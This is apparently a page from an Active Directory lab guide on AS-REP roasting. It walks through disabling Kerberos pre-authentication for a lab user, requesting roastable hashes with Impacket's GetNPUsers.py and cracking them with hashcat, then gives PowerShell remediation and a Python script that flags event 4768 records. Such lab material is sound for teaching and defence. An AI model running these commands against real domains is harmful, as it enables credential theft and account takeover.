# AS-REP Roasting

## Configuring

### Prerequisite

{% content-ref url="https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/initial-access-attacks/username-enumeration" %}
[Username enumeration](https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/initial-access-attacks/username-enumeration)
{% endcontent-ref %}

### Configuring

1. Login on `DC02` with the username `Administrator` and password `Welcome01!`.
2. Open the "Active Directory Users and Computers" administration tool on `DC02`.

![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FsPsuO7X8u9oZt5g95pEy%2Fimage.png?alt=media\&token=65e41b2b-f9c9-4ae1-8936-af488f7fcfd7)

3\. Click on "View" and enable "Advanced Features".

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FEddUrf0LINOKainvPigD%2Fimage.png?alt=media&#x26;token=6e8cf551-b0b7-45b1-a4a5-36db5f18df53" alt=""></div>

4\. Open "Employees", right click the user `Richard` and click on "Properties".

![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FPUkprWXbNU9XtxmEsNRU%2Fimage.png?alt=media\&token=867ee720-076c-4a21-b896-44271ad40773)

5\. Open "Account" and scroll to the bottom of "Account options", then select "Do not require Kerberos preauthentication".

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FgXL9V6J4tcT89SBvxhTO%2Fimage.png?alt=media&#x26;token=30643062-48f3-45ee-8a41-d3af81cde6d2" alt=""></div>

6\. Right click on `Richard` and select "Reset Password". Uncheck "User must change password at next logon" and fill in the password `Sample123`. Click on "OK".

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FSHaN4SLSpxuc0F14LBef%2Fimage.png?alt=media&#x26;token=e3d35395-d5e7-4c65-9704-3a07ee7b122d" alt=""></div>

## Attacking

### How it works

When pre-authentication is not required for an account, an attacker can send an AS-REQ for that user without proving knowledge of its password. The KDC answers with an AS-REP that contains a TGT together with a portion encrypted under a key derived from the user's password; the attacker extracts that encrypted portion as a hash and brute-forces it offline.

### Tools

* [Impacket GetNPUsers.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py)

### Executing the attack

1. Make sure Impacket is installed and run the GetNPUsers.py tool with the users we enumerated earlier and saved in `users.txt`. The tool checks which of the enumerated users do not require pre-authentication and requests an AS-REP for each of them, which we can crack offline.

```
GetNPUsers.py amsterdam/ -dc-ip 10.0.0.3 -usersfile users.txt -format hashcat -outputfile asreproasting
```

![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FCFX8hYbvxU275MZmLIPF%2Fimage.png?alt=media\&token=8bfbf2ff-38f5-4c69-af31-263a83aff703)

2\. The tool doesn't say anything about users that don't require pre-authentication. Check whether the output file exists and cat it:

```
cat asreproasting
```

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FiJU3RJM9TP6Y7RFeiTAF%2Fimage.png?alt=media&#x26;token=2987b624-79d7-4ad6-be60-b99c0565a373" alt=""></div>

3\. The user `Richard` doesn't require pre-authentication and we have a hash from the AS-REP. Let's crack it with Hashcat and [this](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2020-200_most_used_passwords.txt) wordlist. The Hashcat parameters are:

* Cracking mode: `-a 0` for using a wordlist
* Hash mode: `-m 18200` for Kerberos 5, etype 23, AS-REP
* List with hashes: `asreproasting`
* Password list: `2020-200_most_used_passwords.txt`

```
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2020-200_most_used_passwords.txt
hashcat -a 0 -m 18200 asreproasting 2020-200_most_used_passwords.txt
```

![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FwGu4De4NR1rb9IzZUHUv%2Fimage.png?alt=media\&token=6daa689d-a8cf-4571-acda-ae336fb13864)

4\. We successfully cracked the password. The password for `Richard` is `Sample123`.

## Defending

### Recommendations

* Periodically check for users that don't require pre-authentication and remove the attribute.

Check for users with the attribute:

```
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select-Object samAccountName
```

Remove the attribute for a single user:

```
Set-ADAccountControl -DoesNotRequirePreAuth $false -Identity <USER>
```

Check for users with the attribute and remove it:

```
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Set-ADAccountControl -DoesNotRequirePreAuth $false
```

### Detection
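A request that is answered without pre-authentication shows up on the domain controller as Security event 4768 ("A Kerberos authentication ticket (TGT) was requested") with a Pre-Authentication Type of 0, and the default request made by tooling such as GetNPUsers.py asks for RC4-HMAC (etype 23, 0x17), which is exactly the type Hashcat mode 18200 cracks. The following script is an added example, not part of the original page or of Impacket: it runs that logic over a handful of constructed 4768/4769 records shaped like the EventData fields of those events (`TargetUserName`, `PreAuthType`, `TicketEncryptionType`, `IpAddress`, `Status`), flags successful TGT requests without pre-authentication, rates RC4 requests higher, and groups the affected accounts per source address so a sweep over a user list stands out. The field names and sample values are assumptions made for this example.

```python
"""Flag AS-REP roasting candidates in Windows Security event 4768 records.

Added example (not from the original page or from Impacket). Records are
assumed to carry the EventData fields of event 4768; the sample events
below are constructed for this example.
"""
from collections import defaultdict
from dataclasses import dataclass

NO_PREAUTH = "0"    # PreAuthType 0: the AS-REQ carried no pre-authentication data
RC4_HMAC = "0x17"   # etype 23, the encryption type cracked with hashcat -m 18200
SUCCESS = "0x0"     # Status 0x0: the KDC issued the ticket

# Constructed sample events in the shape of event 4768/4769 EventData.
SAMPLE_EVENTS = [
    # Richard (pre-auth disabled in the lab) requested with RC4 from a workstation
    {"EventID": 4768, "TargetUserName": "Richard", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50", "Status": "0x0"},
    # a normal logon: encrypted-timestamp pre-auth (type 2) with AES256
    {"EventID": 4768, "TargetUserName": "Alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.21", "Status": "0x0"},
    # a second no-pre-auth account hit from the same source, but with AES
    {"EventID": 4768, "TargetUserName": "svc-legacy", "PreAuthType": "0",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.50", "Status": "0x0"},
    # a failed request (unknown principal) carries no crackable material
    {"EventID": 4768, "TargetUserName": "nobody", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50", "Status": "0x6"},
    # a service ticket request (4769) is out of scope for this check
    {"EventID": 4769, "TargetUserName": "Alice@AMSTERDAM.LOCAL", "PreAuthType": "-",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.21", "Status": "0x0"},
]


@dataclass(frozen=True)
class Finding:
    account: str
    source_ip: str
    encryption_type: str
    severity: str


def flag_asrep_roast(events):
    """Return one Finding per successful TGT request made without pre-authentication."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("Status") != SUCCESS:
            continue
        if ev.get("PreAuthType") != NO_PREAUTH:
            continue
        etype = ev.get("TicketEncryptionType", "")
        # RC4 is what the roasting tools ask for by default; AES requests still
        # mean the account is roastable but are far more expensive to crack.
        severity = "high" if etype == RC4_HMAC else "medium"
        findings.append(Finding(ev["TargetUserName"], ev.get("IpAddress", "-"), etype, severity))
    return findings


def accounts_per_source(findings):
    """Group flagged accounts by requesting address; several accounts from one host suggest a sweep."""
    by_ip = defaultdict(set)
    for f in findings:
        by_ip[f.source_ip].add(f.account)
    return {ip: sorted(accounts) for ip, accounts in by_ip.items()}


if __name__ == "__main__":
    found = flag_asrep_roast(SAMPLE_EVENTS)
    for f in found:
        print(f"[{f.severity}] {f.account} requested without pre-auth from {f.source_ip} (etype {f.encryption_type})")
    for ip, accounts in accounts_per_source(found).items():
        print(f"{ip}: {len(accounts)} roastable account(s): {', '.join(accounts)}")
```

Because the KDC does not require pre-authentication for these accounts, a legitimate logon by `Richard` also produces a 4768 with Pre-Authentication Type 0, so the pre-auth field alone is a list of roastable accounts rather than proof of an attack; the encryption type and the number of distinct accounts requested from one source are what separate a sweep from normal use, and the `Get-ADUser` check in the recommendations above removes the condition entirely.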

## References

{% embed url="https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py" %}
